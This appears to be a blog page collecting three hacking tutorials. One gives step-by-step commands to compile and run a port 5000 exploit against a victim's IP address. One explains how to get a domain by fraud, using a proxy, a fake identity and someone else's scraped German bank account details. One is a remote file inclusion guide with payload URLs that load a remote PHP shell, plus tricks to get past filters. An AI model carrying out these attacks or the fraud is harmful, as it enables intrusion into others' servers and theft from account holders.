This is the way a system is hacked using Exploits
Exploit is a code built in C, VB etc.. that takes advantage of an open port.
This guide will teach you how to hack into a computer without sending any trojan server in other words - using Exploits..
In the following steps i'll show you how to hack into a computer using a port 5000 exploit, but you can do the same for other ports just download there exploit from:
- Google.com
- Securiteam.com
- K-otik.com
- Astalavista.box.sk
- Coromputer.net
- Securityfocus.com
(Search the exploit as: "Exploit for PORT NUMBER")
STEP 1: Download port 5000 exploit, uslly the exploits come as .txt and you need to change them to .c
http://planet.nana.co.il/progroup/exploits/5000e.zip
After downloading and extracting the port 5000 Exploit we need to compile it (covert it to .exe), In order to compile the exploit we need the "Cygwin" program.
http://sources.redhat.com/cygwin/setup.exe
STEP 2: Open the Cygwin setup.exe and install it by the following pictures:
STEP 3: After installing the program we need to compile the exploit, place the 5000.c exploit in C:\cygwin\bin
then run the command line from - Start - Run - cmd/command
in the command window type:
CD c:\cygwin\bin
gcc 5000.c -o 5000.exe
(CD = Open)
Or follow by the picture:
STEP 4: After we finshed to compiled the exploit we can use it! =)
in order to connect the the victims computer that has port 5000 open in this case..
Open the command line by - Start - Run
then type:
CD c:\cygwin\bin
5000.exe XXX.XXX.XXX.XXX -e
(XXX.XXX.XXX.XXX = Victims IP address)
Or follow by the picture:
Source: hxxp://prorat.net/forum/viewtopic.php?t=1838
Get domain names .com .net ... for free!, Ready ... lets Start!
Okay guys ... i made a tuto how to get a webiste with a domain names (.com .net .info etcetc).
Ready ... lets Start!
Step 1 -
You need a valid german proxy ... go to
http://www.xroxy.com/proxy---DE-ssl.htm
And find one, and set it ... than go here
http://www.ip-adress.com, if it shows a location in germany than the proxy was valid if it shows your location than find another proxy ;)
Step 2 -
We go here:
http://www.1und1.de/
and press 1&1 produkte on the menu on the top!
Reduced: 60% of original size [ 841 x 564 ] - Click to view full image
Step 3 -
Than we put in the domain we want just the name for e.x hackstock no http://www.hackstock.com just hackstock
and chek all the boxes Reduced: 64% of original size [ 793 x 380 ] - Click to view full image
Step 4 -
Now we see wich domains are avalibe ... and wich are not if their status is "Ist frei" thei are avalibe
We choose on ... the others remove the chek choose just one Reduced: 75% of original size [ 680 x 433 ] - Click to view full image
Step 5 -
Now we have to choose wich pack we want we choose the third cause with that pack comes a host+domain name Reduced: 97% of original size [ 524 x 295 ] - Click to view full image
Step 6 -
Scroll the page down and press WEITER Reduced: 73% of original size [ 693 x 284 ] - Click to view full image
Step 7 -
Now in the next page give a name (not yours) adress , PLZ/ORT... a phone number 030/xxxxxxx, your gmail email adress(the confirmation goes there;) (remmember ... a gmail adress cause it doesnt support hotmail!_- Reduced: 81% of original size [ 628 x 503 ] - Click to view full image
Step 8
Now here is the hard part ... we need a blz konto ... go in http://www.bing.com a search for
"blz konto postbank germany 2009" (without "")
And you got a lot of blz kontos find a good one (go to page 5...6...7...nobody goes there, u can find some fresh blz's) when u found one put it on the boxes and remove the characters for e.x
if the blz konto was in this form 123 445-65 , you need to post it like this 12344565 Reduced: 81% of original size [ 629 x 316 ] - Click to view full image
Step 9 -
Now put a password twice ... the passwords must match ... and a secret anwser Reduced: 80% of original size [ 637 x 335 ] - Click to view full image
Step 10 -
Accept the TOS and press Bestellung
Step 10 -
When u got like in this image, u are done ... wait 24h for the activation ;) Reduced: 72% of original size [ 709 x 303 ] - Click to view full image
Step 11 -
Chek your gmail inbox for any message from 1&1
It should look like this
http://img91.imageshack.us/img91/2816/21214190.jpg
If u didnt recvieced any message than not:S ... search for another blz kontoo ...
P.S... this is the last webpage that i bought in this way http://www.php-mailer.com/
Dont forget ... it takes 24h for the activation ;)
Try it :D:D
About remote file inclusion |RFI|
about remote file inclusion |RFI|
remote file inclusion is where you include a remote file..usaully the file you include will be for malicious purposes
backdoors
what is a backdoor
well your house has a front door...that usually is supposed to be welcoming
a backdoor doesnt look welcoming because people arent usually supposed to use it
a computer backdoor is a code/script that runs on a system with stealth
it allows hackers secret access to the affected system if it is setup up correctly
a backdoor usualy runs as a hidden proccess and will open various port and accept commands for the hacker that is using it
shell
what is a shell
there are many forms of shells..we will not be talking about sea shells today though
a shell on a system is a session/terminal that takes commands etc..like a mini command center
shells can be in php,java,c and other various languages
today i will explain a php shell is
a php shell is a script in php designed to take user inputted commands and browse files,execute commands,edit files,upload files,like a files manager
a php shell is executed via your web browser
eg...www.sites.com/shell.php?
the php shell gives you the same sort of access as if you were at that machine on the same account it is executed on..
remote file inclusion happens usually when someone make a php script and doesnt code it so that the script sanitizes the users input and there are no restrictions running on the server hosting the website with the vulnerable page
a vulnerable page's source code may have this in it
this would mean that
"page" without the quotes is the variable
so you would typesite.com/index.php?page=http://site.com/shell.txt?
note:it must be .txt in extension on server otherwise it will run on the other server where the remote file is located
also rfi wont work if url fopen or url include is disabled or if the page is patched
in order to patch theor script in php they should replace
require($page . "faq.php");
withrequire("faq.php");
and then the script cant take user input through the url
also if there is mod_security enabled try encoding the shell link in base 64 or hex code
and for scripts that dont fully sanitise the user input but do check to a certain extent
use the nullbyte trick at the very end of the url
eg:site.com/index.php?page=http://site.com/shell.txt?
well if there is anything i missed.tell me
edit:
thought of 2 i forgot myself
some filters filter out http:// so try ftp:// instead
so instead of using the http protocal use the ftp protocal
also try converting the shells link to binary
eg
site.com/index.php?page=binary string
---------updated
okies this is just small a update
sometimes a site may have in its code some security code to make it so that the file MUST have an extension of .html or somethinng or .pdf
so if you atacked127.0.0.1index.php?page=document.pdf
and changed the document.pdf to your shell link127.0.0.1index.php?page=http://shell.com/shell.txt?
and got an error like this
warning: failed for inclusion http://site.com/shell.txt.pdf? blah blah blah
notice your input was shell.txt and it tried including a file called shell.txt.pdf
then you would goto your shell host and create a rule with a .htaccess file with the following codeAddType application/octect-stream pdf
you could also make it show the php file as a text file by usingAddType text/plain pdf
save this as a .htaccess file with 1 of the 2 codes above
anyways now lets get to the interesting part
now lets remember your php shell must end in a .pdf extension but show as a txt file
so rename your file shell.txt to shell.pdf
now goto your victim site and dont include the extension,let the php code do the work for ya;) teamwork is always usefull
and use127.0.0.1index.php?page=http://shell.com/shell
because the script automaticly adds the .pdf extension for you so you have127.0.0.1index.php?page=http://shell.com/shell.pdf
sweet!
anyways hope this is usefull to some ppl
![[2a6jvpg.jpg.gif]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3DeVwIT-rEycs4ctNT_UgpN21U1q3RdP9EXdVwqjokQY4NqnNBpYGQiHOjnWQmglOPKSDXY6-kcRpma2OHgAGCcZc7kWrO1NJ_P2oNHWWiuVXxaWw9f9idyRfLbvfdpxZ5xb3hKMl6nnS/s1600/2a6jvpg.jpg.gif)
![[Specialsecurity.gif]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHdW_yAzCMaTqyzMc0_GRFdQ2xE-zzIl8mKdce4euar70R1CDH8hMM17hcOv5KWTrHQdt7CCPpbTzOPQAahU72e-UmyHSii9pkIOZV0ETPdrnKo21UgGYExqIqkuBgWNMZ7YEX47bSUCKa/s1600/Specialsecurity.gif)
